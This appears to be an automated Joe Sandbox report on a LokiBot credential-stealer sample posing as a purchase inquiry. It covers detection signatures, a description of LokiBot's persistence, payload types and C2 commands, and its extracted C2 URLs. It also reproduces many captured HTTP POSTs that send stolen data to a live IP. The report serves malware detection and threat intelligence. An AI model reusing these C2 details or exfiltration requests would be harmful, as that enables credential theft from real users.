Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Inquiry_#466789.exe

Overview

General Information

Sample name:Purchase Inquiry_#466789.exe
Analysis ID:1447828
MD5:5eece0f9333721c96803f39becae9fa3
SHA1:4508905c92a34c55d3b9b9fa5700c6b640b9a200
SHA256:706a564a593479d9948fe8cfe542c4a788a80e3d08c38dc888179c5340023a08
Tags:exeLoki
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Purchase Inquiry_#466789.exe (PID: 1880 cmdline: "C:\Users\user\Desktop\Purchase Inquiry_#466789.exe" MD5: 5EECE0F9333721C96803F39BECAE9FA3)
    • Purchase Inquiry_#466789.exe (PID: 7244 cmdline: "C:\Users\user\Desktop\Purchase Inquiry_#466789.exe" MD5: 5EECE0F9333721C96803F39BECAE9FA3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.61.137.215/index.php/t?id=090"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.2909018268.00000000011B8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            Click to see the 30 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.Purchase Inquiry_#466789.exe.400000.0.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              2.2.Purchase Inquiry_#466789.exe.400000.0.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                2.2.Purchase Inquiry_#466789.exe.400000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  2.2.Purchase Inquiry_#466789.exe.400000.0.raw.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                  • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                  2.2.Purchase Inquiry_#466789.exe.400000.0.raw.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                  • 0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                  Click to see the 37 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  Timestamp:05/27/24-08:32:00.314607
                  SID:2024312
                  Source Port:49735
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:03.034243
                  SID:2025381
                  Source Port:49737
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:14.993058
                  SID:2021641
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:05.506034
                  SID:2024318
                  Source Port:49739
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:10.321376
                  SID:2025381
                  Source Port:49741
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:14.993058
                  SID:2024313
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:10.321376
                  SID:2021641
                  Source Port:49741
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:10.321376
                  SID:2024313
                  Source Port:49741
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:00.314607
                  SID:2024317
                  Source Port:49735
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:00.314607
                  SID:2021641
                  Source Port:49735
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:07.737924
                  SID:2024318
                  Source Port:49740
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:05.506034
                  SID:2024313
                  Source Port:49739
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:05.506034
                  SID:2021641
                  Source Port:49739
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:07.737924
                  SID:2024313
                  Source Port:49740
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:14.993058
                  SID:2025381
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:03.034243
                  SID:2024317
                  Source Port:49737
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:05.506034
                  SID:2025381
                  Source Port:49739
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:07.737924
                  SID:2021641
                  Source Port:49740
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:10.321376
                  SID:2024318
                  Source Port:49741
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:00.314607
                  SID:2025381
                  Source Port:49735
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:03.034243
                  SID:2024312
                  Source Port:49737
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:03.034243
                  SID:2021641
                  Source Port:49737
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:07.737924
                  SID:2025381
                  Source Port:49740
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/27/24-08:32:14.993058
                  SID:2024318
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: Purchase Inquiry_#466789.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: http://kbfvzoboss.bid/alien/fre.phpURL Reputation: Label: malware
                  Source: http://alphastand.top/alien/fre.phpURL Reputation: Label: malware
                  Source: http://alphastand.top/alien/fre.phpURL Reputation: Label: malware
                  Source: http://alphastand.win/alien/fre.phpURL Reputation: Label: malware
                  Source: http://alphastand.trade/alien/fre.phpURL Reputation: Label: malware
                  Source: http://alphastand.trade/alien/fre.phpURL Reputation: Label: malware
                  Source: http://45.61.137.215/index.php/feed/Avira URL Cloud: Label: malware
                  Source: http://45.61.137.215/index.php/wp-json/Avira URL Cloud: Label: malware
                  Source: http://45.61.137.215/index.php/comments/feed/Avira URL Cloud: Label: malware
                  Source: http://45.61.137.215/index.php/t?id=090Avira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 00000000.00000002.1674289930.0000000002D79000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.61.137.215/index.php/t?id=090"]}
                  Multi AV Scanner detection for domain / URL
                  Source: http://45.61.137.215/index.php/feed/Virustotal: Detection: 6%Perma Link
                  Source: http://45.61.137.215/index.php/comments/feed/Virustotal: Detection: 6%Perma Link
                  Source: http://45.61.137.215/index.php/t?id=090Virustotal: Detection: 18%Perma Link
                  Source: http://45.61.137.215/index.php/wp-json/Virustotal: Detection: 6%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: Purchase Inquiry_#466789.exeReversingLabs: Detection: 71%
                  Source: Purchase Inquiry_#466789.exeVirustotal: Detection: 43%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: Purchase Inquiry_#466789.exeJoe Sandbox ML: detected
                  Source: Purchase Inquiry_#466789.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Purchase Inquiry_#466789.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49735 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49735 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49735 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49735 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49737 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49737 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49737 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49737 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49739 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49739 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49739 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49739 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49740 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49740 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49740 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49740 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49741 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49741 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49741 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49741 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49742 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49742 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49742 -> 45.61.137.215:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49742 -> 45.61.137.215:80
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                  Source: Malware configuration extractorURLs: http://45.61.137.215/index.php/t?id=090
                  Source: Joe Sandbox ViewIP Address: 45.61.137.215 45.61.137.215
                  Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 176Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 176Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 149Connection: close
